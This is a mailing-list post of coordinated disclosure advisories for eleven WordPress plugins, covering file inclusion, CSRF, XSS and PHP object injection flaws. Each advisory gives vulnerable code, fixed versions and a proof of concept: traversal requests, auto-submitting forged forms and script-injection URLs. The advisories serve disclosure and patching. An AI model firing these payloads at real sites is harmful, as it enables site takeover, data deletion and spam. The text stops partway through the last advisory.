Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 15 Aug 2016 18:25:24 +0200
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple vulnerabilities affecting eleven WordPress Plugins (XSS,
 CSRF, LFI & object injection)

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.




------------------------------------------------------------------------
Ajax Load More Local File Inclusion vulnerability
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the Ajax Load More WordPress plugin is vulnerable
to Local File Inclusion. This issue can potentially be exploited to run
arbitrary PHP code. In order to do so, the attacker must be able to
place an arbitrary PHP file on the target system. The malicious file
must have the .php extension.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0034

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was succesfully tested on the Ajax Load More - Infinite
Scroll [2] WordPress Plugin version 2.11.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is fixed in version 2.11.2 [3]

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
Userinput $repeater is sent to $include = ALM_REPEATER_PATH .
'repeaters/'. $template .'.php'; which results in Local File Inclusion. 
For a succesfull exploit the payload needed to contain 'repeater' value
and a numeric value which when splitted by 'alm_get_repeater_type'
results in 'repeater' for the $type parameter.

repeater=repeater2f%2e%2e%2f../../../xmlrpc

https://www.owasp.org/index.php/PHP_File_Inclusion
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion

$repeater = (isset($_GET['repeater'])) ? $_GET['repeater'] :
'default';		
$type = alm_get_repeater_type($repeater);
	
function alm_get_repeater_type($repeater){
	$type = preg_split('/(?=\d)/', $repeater, 2); // split $repeater value
at number to determine type
   $type = $type[0]; // default | repeater | template_	
	return $type;
}
	
[..]
	
if($queryType === 'standard'){ 
	
[..]
	
	if($theme_repeater != 'null' && has_action('alm_get_theme_repeater')){
		   				do_action('alm_get_theme_repeater', $theme_repeater,
$alm_found_posts, $alm_page, $alm_item, $alm_current); // Theme Repeater
						}else{
							include( alm_get_current_repeater($repeater, $type) ); //Include
repeater template
						}
						
[..]
	
function alm_get_current_repeater($repeater, $type) {
   
	$template = $repeater;
	$include = '';
		
	// If is Custom Repeaters (Custom Repeaters v1)
	if( $type == 'repeater' && has_action('alm_repeater_installed' )){ 
		$include = ALM_REPEATER_PATH . 'repeaters/'. $template .'.php';     
					
		
		if(!file_exists($include)) //confirm file exists        			
		   alm_get_default_repeater(); 
		
	}
   // If is Unlimited Repeaters (Custom Repeaters v2)
	elseif( $type == 'template_' && has_action('alm_unlimited_installed'
)){
		global $wpdb;
		$blog_id = $wpdb->blogid;
		
		if($blog_id > 1){	
			$include = ALM_UNLIMITED_PATH. 'repeaters/'. $blog_id .'/'.$template
.'.php';
		}else{
			$include = ALM_UNLIMITED_PATH. 'repeaters/'.$template .'.php';		
		}   		
				
		if(!file_exists($include)) //confirm file exists        			
		   $include = alm_get_default_repeater(); 			
	
	}
	// Default repeater
	else{				
		$include = alm_get_default_repeater();
	}
		
	return $include;
	
}

The victim should have the paid add-on Custom Repeater or Unlimited
installed.

------------------------------------------------------------------------
Proof of Concept
------------------------------------------------------------------------
GET
/html/wp-admin/admin-ajax.php?action=alm_query_posts&query_type=standard&nonce=&repeater=repeater2f%2e%2e%2f../../../xmlrpc&theme_repeater=null
HTTP/1.1
Host: 192.168.50.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0)
Gecko/20100101 Firefox/47.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://192.168.50.9/html/
Cookie: 
Connection: close
Pragma: no-cache
Cache-Control: no-cache
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/ajax_load_more_local_file_inclusion_vulnerability.html
[2] https://wordpress.org/plugins/ajax-load-more/
[3] https://wordpress.org/plugins/ajax-load-more/changelog/
------------------------------------------------------------------------
Cross-Site Request Forgery in Photo Gallery WordPress Plugin allows
adding of images
------------------------------------------------------------------------
Umit Aksu, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability was found in the Photo
Gallery by Supsystic WordPress Plugin. This issue can be used by an
attacker to add images to a gallery.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160722-0001

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Photo Gallery by Supsystic [2]
WordPress Plugin version 1.8.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Photo Gallery by Supsystic version 1.8.6 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Photo Gallery by Supsystic [2] WordPress Plugin can be used to
create portfolios and image galleries. A Cross-Site Request Forgery
vulnerability was found in the Photo Gallery by Supsystic WordPress
Plugin. This issue can be used by an attacker to  add images to a
gallery.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists because Photo Gallery lacks protection against
Cross-Site Request Forgery attacks. Due to this, it is possible to add
images to a gallery. In order to exploit this issue, the attacker has to
lure/force a victim into opening a malicious website/link.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form method="post" action="http://<target>/wp-admin/admin-ajax.php">
			<input type="hidden" name="action" value="grid-gallery">
			<input type="hidden" name="galleryId" value="5">
			<input type="hidden" name="attachType" value="gallery">
			<input type="hidden" name="folder_id" value="0">
			<input type="hidden" name="attachment_id" value="10">
			<input type="hidden" name="route[module]" value="photos">
			<input type="hidden" name="route[action]" value="add">
		</form>
		<script>
			document.forms[0].submit();
		</script>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_photo_gallery_wordpress_plugin_allows_adding_of_images.html
[2] https://wordpress.org/plugins/gallery-by-supsystic/
[3] https://downloads.wordpress.org/plugin/gallery-by-supsystic.zip
------------------------------------------------------------------------
Cross-Site Request Forgery in Photo Gallery WordPress Plugin allows
deleting of galleries
------------------------------------------------------------------------
Umit Aksu, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability was found in the Photo
Gallery by Supsystic WordPress Plugin. This issue can be used by an
attacker to delete arbitrary gallleries.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160722-0003

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Photo Gallery by Supsystic [2]
WordPress Plugin version 1.8.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Photo Gallery by Supsystic version 1.8.6 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Photo Gallery by Supsystic [2] WordPress Plugin can be used to
create portfolios and image galleries. A Cross-Site Request Forgery
vulnerability was found in the Photo Gallery by Supsystic WordPress
Plugin. This issue can be used by an attacker to delete arbitrary
gallleries.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists because Photo Gallery lacks protection against
Cross-Site Request Forgery attacks. Due to this, it is possible to
delete arbitrary gallleries. In order to exploit this issue, the
attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<img
src="http://<target>/wp-admin/admin.php?page=supsystic-gallery&module=galleries&action=delete&gallery_id=10
">
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_photo_gallery_wordpress_plugin_allows_deleting_of_galleries.html
[2] https://wordpress.org/plugins/gallery-by-supsystic/
[3] https://downloads.wordpress.org/plugin/gallery-by-supsystic.zip
------------------------------------------------------------------------
Cross-Site Request Forgery in Photo Gallery WordPress Plugin allows
deleting of images
------------------------------------------------------------------------
Umit Aksu, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability was found in the Photo
Gallery by Supsystic WordPress Plugin. This issue can be used by an
attacker to delete arbitrary images from the Photo Gallery.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160722-0002

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Photo Gallery by Supsystic [2]
WordPress Plugin version 1.8.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Photo Gallery by Supsystic version 1.8.6 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Photo Gallery by Supsystic [2] WordPress Plugin can be used to
create portfolios and image galleries. A Cross-Site Request Forgery
vulnerability was found in the Photo Gallery by Supsystic WordPress
Plugin. This issue can be used by an attacker to delete arbitrary images
from the Photo Gallery.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists because Photo Gallery lacks protection against
Cross-Site Request Forgery attacks. Due to this, it is possible to
delete images from an existing gallery. In order to exploit this issue,
the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form method="post"
action="http://192.168.1.18/wp-admin/admin-ajax.php">
			<input type="hidden" name="action" value="grid-gallery">
			<input type="hidden" name="gallery_id" value="2">
			<input type="hidden" name="ids[]" value="5">
			<input type="hidden" name="ids[]" value="7">
			<input type="hidden" name="route[module]" value="galleries">
			<input type="hidden" name="route[action]" value="deleteResource">
		</form>
		<script>
			document.forms[0].submit();
		</script>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_photo_gallery_wordpress_plugin_allows_deleting_of_images.html
[2] https://wordpress.org/plugins/gallery-by-supsystic/
[3] https://downloads.wordpress.org/plugin/gallery-by-supsystic.zip
------------------------------------------------------------------------
Cross-Site Request Forgery vulnerability in Add From Server WordPress
Plugin
------------------------------------------------------------------------
Edwin Molenaar [2], July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that Add From Server is vulnerabile to Cross-Site
Request Forgery. It can be exploited by luring the target user into
clicking a specially crafted link or visiting a malicious website (or
advertisement). An attacker can use this issue to add illegal content to
the victims server, or add very large files to the victim's server to
exaust the amount of avalible disk space.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160718-0004

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
These issues were successfully tested on Add From Server [3] WordPress
Plugin version 6.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Add From Server version 3.3.2 [4].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Add From Server [3] WordPress Plugin is a quick plugin, which allows
you to import media & files into the WordPress uploads manager from
(remote) webservers. It was discovered that Add From Server is
vulnerabile to Cross-Site Request Forgery. It can be exploited by luring
the target user into clicking a specially crafted link or visiting a
malicious website (or advertisement). Because of this, 
the following attack scenario's could be possible:

- Adding illegal content to the victim's server.
- Adding very large files to the victim's server to exaust the amount of
avalible disk space.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
When a (media) file is added from the server, the source is not
validated. This means that not only files from the localhost can be
added, but also from other sources. The affected code is not protected
with an anti-Cross-Site Request Forgery token.

The function handle_imports() only removes slashes. The vulnerability
exists in the file add-from-server/class.add-from-server.php (line 213).
Because slashes are removed, the file that will be uploaded must exist
in the server root. For example: www.example.com/largefile.txt

The host and filename will be set in a separate parameter, so no slashes
are needed.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
POST /wp-admin/upload.php?page=add-from-server HTTP/1.1
Host: <target>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
	
files%5B%5D=largefile.txt&import-date=current&cwd=www.example.com&import=Import
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_vulnerability_in_add_from_server_wordpress_plugin.html
[2] https://www.linkedin.com/in/edwinmolenaar
[3] https://wordpress.org/plugins/add-from-server/
[4] https://downloads.wordpress.org/plugin/add-from-server.3.3.2.zip
------------------------------------------------------------------------
Cross-Site Request Forgery vulnerability in Email Users WordPress Plugin
------------------------------------------------------------------------
Julien Rentrop, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was found that the Email Users WordPress Plugin is vulnerable to
Cross-Site Request Forgery. By using this issue it is possible for an
attacker to send arbitrary (bulk) email messages to any address. In
order to exploit this issue, an attacker needs to lure a target user
into clicking a specially crafted link or visiting a malicious website
(or advertisement).

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160718-0001

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Email Users [2] WordPress Plugin
version 4.8.3.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Email Users version 4.8.4 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Email Users [2] WordPress Plugin allows site editors to send an
e-mail to the blog users. It was found that the Email Users WordPress
Plugin is vulnerable to Cross-Site Request Forgery. By using this issue
it is possible for an attacker to send arbitrary (bulk) email messages
to any address.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The email users admin page has admin pages for;

- Send to individual user(s)
- Send to group of users
- Settings

These functions can all be triggered using a CSRF attack. These
functions can get executed when a logged on admin user gets triggered in
to opening a page the attacker controls. Especially the option to send
mails to groups of users is interesting for an attacker. In order to
exploit this issue, an attacker needs to lure a target user into
clicking a specially crafted link or visiting a malicious website (or
advertisement).

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
As you can see in all messages there is not a WordPress nonce (or other
kind of CSRF token) present. This makes the CSRF possible. The cookie
values should be replaced by the values of a logged on admin user. Most
unneeded headers/params are stripped in the examples.

------------------------------------------------------------------------
Send to individual user(s)
------------------------------------------------------------------------
See below the example message. The attacker can fill in the various
fields such as body of the mail. For verification check if the response
contains "<p>Email sent to" (followed by nr of users). As user id's are
just sequential numbers an attacker can send a list of id's. The
"%5B%5D" part is url encoded form of [], so it's also possible to send
in a list of user id's at once.

POST /wp-admin/admin.php?page=mailusers-send-to-user-page HTTP/1.1
Host: <target>
Content-Length: 157
Content-Type: application/x-www-form-urlencoded
Cookie:
wordpress_=wordpress%7C1468866087%7CkHiDEavVSFosPzEhZ8n073TzlG0EquiX7MWSZG5rdei%7Cc51c6bb8ebf70980d284f8a03ebe7d749dd4bb92caac78f8d46bd1e85eb593c9;
PHPSESSID=5240mh3f8gfdnn0r1hhbvinoh3;
Connection: close
	
send=true&fromName=wordpress&fromAddress=sumofpwn%40mailinator.com&mail_format=html&send_users%5B%5D=2&subject=test&mailcontent=test&Submit=Send+Email+%C2%BB

------------------------------------------------------------------------
Send to group of users
------------------------------------------------------------------------
See above. Here the send_targets param is used to send to the
role-subscriber users.

POST /wp-admin/admin.php?page=mailusers-send-to-group-page HTTP/1.1
Host: <target>
Content-Length: 257
Content-Type: application/x-www-form-urlencoded
Cookie:
wordpress_=wordpress%7C1468866087%7CkHiDEavVSFosPzEhZ8n073TzlG0EquiX7MWSZG5rdei%7Cc51c6bb8ebf70980d284f8a03ebe7d749dd4bb92caac78f8d46bd1e85eb593c9;
PHPSESSID=5240mh3f8gfdnn0r1hhbvinoh3;
Connection: close
	
send=true&fromName=other&fromAddress=other%40mail.com&group_mode=role&mail_format=html&send_targets%5B%5D=role-subscriber&subject=Subject+mail+to+all+subscribers&mailcontent=%3Cstrong%3EMessage+mail+to+all+subscribers%3C%2Fstrong%3E&Submit=Send+Email+%C2%BB

------------------------------------------------------------------------
Settings
------------------------------------------------------------------------
The following requests turns off noticiations for user id 1. Other
modifications are also possible. Note; this is a bit different from
previous requests since this is GET instead of POST.

GET
/wp-admin/admin.php?page=mailusers-user-settings&action=notifications_off&user%5B%5D=1
HTTP/1.1
Host: <target>
Cookie:
wordpress_=wordpress%7C1468866087%7CkHiDEavVSFosPzEhZ8n073TzlG0EquiX7MWSZG5rdei%7Cc51c6bb8ebf70980d284f8a03ebe7d749dd4bb92caac78f8d46bd1e85eb593c9;
PHPSESSID=5240mh3f8gfdnn0r1hhbvinoh3;
Connection: close
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_vulnerability_in_email_users_wordpress_plugin.html
[2] https://wordpress.org/plugins/email-users/
[3] https://downloads.wordpress.org/plugin/email-users.4.8.4.zip
------------------------------------------------------------------------
Cross-Site Scripting/Cross-Site Request Forgery in Peter's Login
Redirect WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Peter's Login
Redirect WordPress Plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf. In addition the
Plugin is vulnerable to Cross-Site Request Forgery, which allows an
attacker to change any setting of this plugin. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0028

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Peter's Login Redirect [2]
WordPress Plugin version 2.9.0.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Peter's Login Redirect version 2.9.1 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Peter's Login Redirect [2] WordPress Plugin redirect users to
different locations after logging in and logging out. A Cross-Site
Scripting vulnerability was found in the Peter's Login Redirect
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In addition the Plugin is
vulnerable to Cross-Site Request Forgery, which allows an attacker to
change any setting of this plugin.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists because Peter's Login Redirect lacks protection
against Cross-Site Request Forgery attacks. In addition, the plugin
lacks proper output encoding, rendering it vulnerable to Cross-Site
Scripting. See for example the following code fragment.

elseif( $rul_type == 'role' )
{
	$rul_rolevalues .= '<form name="rul_role_edit_form[' . $i_role . ']"
action="?page=' . basename(__FILE__) . '" method="post">';
	$rul_rolevalues .= '<tr>';
	$rul_rolevalues .= '<td><p><input type="hidden" name="rul_role"
value="' . $rul_value . '" /> ' . $rul_value . '</p></td>';
	$rul_rolevalues .= '<td>';
	$rul_rolevalues .= '<p>' . __('Login URL', 'peters-login-redirect' ) .
'<br /><input type="text" size="90" maxlength="500"
name="rul_role_address" value="' . $rul_url . '" /></p>';
	$rul_rolevalues .= '<p>' . __('Logout URL', 'peters-login-redirect' ) .
'<br /><input type="text" size="60" maxlength="500"
name="rul_role_logout" value="' . $rul_url_logout . '" /></p>';
	$rul_rolevalues .= '</td>';
	$rul_rolevalues .= '<td><p><input name="rul_role_edit" type="submit"
value="' . __( 'Edit', 'peters-login-redirect' ) . '" /> <input
type="submit" name="rul_role_delete" value="' . __( 'Delete',
'peters-login-redirect' ) . '" /></p></td>';
	$rul_rolevalues .= '</tr>';
	$rul_rolevalues .= '</form>';
                    
	$rul_roles_existing[$rul_value] = '';
                    
	++$i_role;
}

In order to exploit this issue, the attacker has to lure/force a logged
on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/options-general.php?page=wplogin_redirect.php"
method="POST">
			<input type="hidden" name="rul&#95;role" value="administrator" />
			<input type="hidden" name="rul&#95;role&#95;address"
value="&quot;><script>alert(1);</script>" />
			<input type="hidden" name="rul&#95;role&#95;logout" value="" />
			<input type="hidden" name="rul&#95;role&#95;submit"
value="Add&#32;role&#32;rule" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_cross_site_request_forgery_in_peter_s_login_redirect_wordpress_plugin.html
[2] https://wordpress.org/plugins/peters-login-redirect/
[3] https://downloads.wordpress.org/plugin/peters-login-redirect.zip
------------------------------------------------------------------------
Cross-Site Scripting in Link Library WordPress Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Reflected Cross-Site Scripting (XSS) vulnerability has been found in
the Link Library plugin. By using this vulnerability an attacker can
inject malicious JavaScript code into the application, which will
execute within the browser of any logged-in admin.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0016

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Link Library [2] version
5.9.12.29.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is fixed in version 5.9.12.30 [3]

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
Cross-Site Scripting (XSS) attacks are a type of injection, in which
malicious scripts are injected into otherwise benign and trusted web
sites. XSS attacks occur when an attacker uses a web application to send
malicious code, generally in the form of a browser side script, to a
different end user. Flaws that allow these attacks to succeed are quite
widespread and occur anywhere a web application uses input from a user
within the output it generates without validating or encoding it.
Reflected XSS occurs when user input is immediately returned by a web
application in an error message, search result, or any other response
that includes some or all of the input provided by the user as part of
the request

"successimportcount" and "sucessupdatecount" fields do not validate
<script> tags and do not perform output encoding.

/link-library/link-library-admin.php
885: echo echo "<div id='message' class='updated fade'><p><strong>" .
($_GET['successimportcount'] : '0') . " " . __('link(s) imported',
'link-library') . ", " . ($_GET['successupdatecount'] : '0') . " " .
__('link(s) updated', 'link-library') . ".</strong></p></div>";

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
http://<targetsite>/wp-admin/admin.php?page=link-library-settingssets&messages=9&successimportcount=1"
/><script>alert(1)</script>&currenttab=importexport[h3]References[/h3]
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_link_library_wordpress_plugin.html
[2] https://wordpress.org/plugins/link-library/
[3] https://nl.wordpress.org/plugins/link-library/changelog/
------------------------------------------------------------------------
Cross-Site Scripting in Store Locator Plus for WordPress
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in Store Locator Plus for
WordPress. This issue allows an attacker to perform a wide variety of
actions, such as stealing Administrators' session tokens, or performing
arbitrary actions on their behalf. In order to exploit this issue, the
attacker has to lure/force a logged on WordPress Administrator into
opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0025

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Store Locator Plus for WordPress
[2] version 4.5.09.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been addressed in Store Locator Plus for WordPress
version 4.5.12 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Store Locator Plus for WordPress [2] is a location mapping and directory
system with over 10,000 active installations. A Cross-Site Scripting
vulnerability was found in Store Locator Plus for WordPress. This issue
allows an attacker to perform a wide variety of actions, such as
stealing Administrators' session tokens, or performing arbitrary actions
on their behalf.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists in the file include/class.admin.locations.add.php and
is caused due to the lack of output encoding on the start request
parameter.

$this->section_params['opening_html'] =
	"<form id='manualAddForm' name='manualAddForm' method='post'>" .
	( $this->adding ? '<input type="hidden" id="act" name="act" value="add"
/>' : '<input type="hidden" id="act" name="act" value="edit" />' ) .
	"<input type='hidden' name='id' " .
	"id='id' value='{$this->slplus->currentLocation->id}' />" .
	"<input type='hidden' name='locationID' " .
	"id='locationID' value='{$this->slplus->currentLocation->id}' />" .
	"<input type='hidden'
name='linked_postid-{$this->slplus->currentLocation->id}' " .
	"id='linked_postid-{$this->slplus->currentLocation->id}' value='" .
	$this->slplus->currentLocation->linked_postid .
	"' />" .
	( isset( $_REQUEST['start'] ) ? "<input type='hidden' name='start'
id='start' value='{$_REQUEST['start']}' />" : '' ) .
	"<a name='a{$this->slplus->currentLocation->id}'></a>";
	
In order to exploit this issue, the attacker has to lure/force a logged
on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
http://<target>/wp-admin/admin.php?page=slp_manage_locations&start=%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_store_locator_plus_for_wordpress.html
[2] https://wordpress.org/plugins/store-locator-le/
[3] https://downloads.wordpress.org/plugin/store-locator-le.4.5.12.zip
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Google Maps WordPress Plugin
------------------------------------------------------------------------
Julien Rentrop, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Google Maps
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0038

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Google Maps [2] WordPress Plugin
version 2.1.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Google Maps version 2.1.4 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Google Maps [2] WordPress Plugin is a simple and effective tool for
rapid creation of individual Google Maps in posts and pages. A
Cross-Site Scripting vulnerability was found in the Google Maps
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists due to the lack of output encoding on the id URL
parameter. The vulnerable code fragment is listed below:

<form
action="admin.php?page=hugeitgooglemaps_main&task=edit_cat&id=<?php echo
$_GET['id']; ?>" method="post" name="adminform" id="adminform">

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
http://<target>/wp-admin/admin.php?page=hugeitgooglemaps_main&task=edit_cat&id=1%22%3E%3Ch3%3EBREAK%3C%2Fh3%3E
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_google_maps_wordpress_plugin.html
[2] https://wordpress.org/plugins/google-maps/
[3] https://downloads.wordpress.org/plugin/google-maps.2.1.4.zip
------------------------------------------------------------------------
Ecwid Ecommerce Shopping Cart WordPress Plugin unauthenticated PHP
Object injection vulnerability
------------------------------------------------------------------------
Yorick Koster, June 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A PHP Object injection vulnerability was found in the Ecwid Ecommerce
Shopping Cart WordPress Plugin, which can be used by an unauthenticated
user to instantiate arbitrary PHP Objects. Using this vulnerability it
is possible to execute arbitrary PHP code.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160803-0002

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Ecwid Ecommerce Shopping Cart
[2] WordPress Plugin version 4.4/4.4.3.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been addressed in Ecwid Ecommerce Shopping Cart version
4.4.4 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Ecwid Ecommerce Shopping Cart [2] WordPress Plugin is an easy-to-use
online store solution that gives you a full-functioned shop on your
WordPress website. A PHP Object injection [4] vulnerability was found in
the Ecwid Ecommerce Shopping Cart WordPress Plugin, which can be used by
an unauthenticated user to instantiate arbitrary PHP Objects.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue is possible due to an unsafe call to unserialize() in the
_load_state() method. The input is taken directly from the
ecwid_oauth_state cookie as can be seen in the following code fragment:

includes/class-ecwid-oauth.php:

protected function _load_state() {
	if (isset($_COOKIE['ecwid_oauth_state'])) {
		$this->state = @unserialize( $_COOKIE['ecwid_oauth_state'] );
	
}

It has been confirmed that this issues can be used to execute arbitrary
PHP code.
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/ecwid_ecommerce_shopping_cart_wordpress_plugin_unauthenticated_php_object_injection_vulnerability.html
[2] https://wordpress.org/plugins/ecwid-shopping-cart/
[3] https://downloads.wordpress.org/plugin/ecwid-shopping-cart.4.4.4.zip
[4] https://www.owasp.org/index.php/PHP_Object_Injection
------------------------------------------------------------------------
Persistent Cross-Site Scripting in Magic Fields 1 WordPress Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Magic Fields 1
plugin. This issue allows an attacker to perform a wide variety of
actions, such as stealing Administrators' session tokens, or performing
arbitrary actions on their behalf. In order to exploit this issue, the
attacker has to lure/force a logged on WordPress Administrator into
opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0020

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Magic Fields 1 [2] version 1.7.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is fixed in version 1.7.2 [3]

